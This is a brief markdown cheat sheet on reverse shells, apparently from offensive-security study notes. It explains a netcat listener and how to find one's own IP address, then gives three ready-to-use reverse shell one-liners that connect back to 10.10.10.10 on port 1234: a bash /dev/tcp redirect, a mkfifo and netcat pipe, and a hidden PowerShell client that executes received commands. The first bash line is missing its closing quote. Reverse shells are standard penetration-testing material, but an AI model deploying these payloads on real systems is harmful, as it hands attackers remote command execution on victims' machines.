# Reverse Shell
## Netcat Listner 
```
nc -lvnp {port}
```
* This command will start a netcat listner on the desired port 
    * `-l` flag is used to enable  listen
    * `-v` flag is used to have a verbose output so that we can get info when we are connected to the target
    * `-n` flag is used to disable DNS  so that the connection is fast
    * `-p` flag is used to tell the port number at which we are listening
*  This will enable netcat listener which is wating for an connection
## Connect back IP
```
ip a
```
* This command on linux will tell us our IP address
## Reverse Shell command
```
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1
```
```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
```
```
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.10.10",1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
* These are some of example of how can we start a connection with listner on the
  target machine 
* The first 2 are bash scripts and the third one is a windows powershell scirpt
## Disadvantages
* The disadvantage using this shell is that as the command executed on taget is stoped the shell is stoped and then we have re enable by exploiting what we first exploited

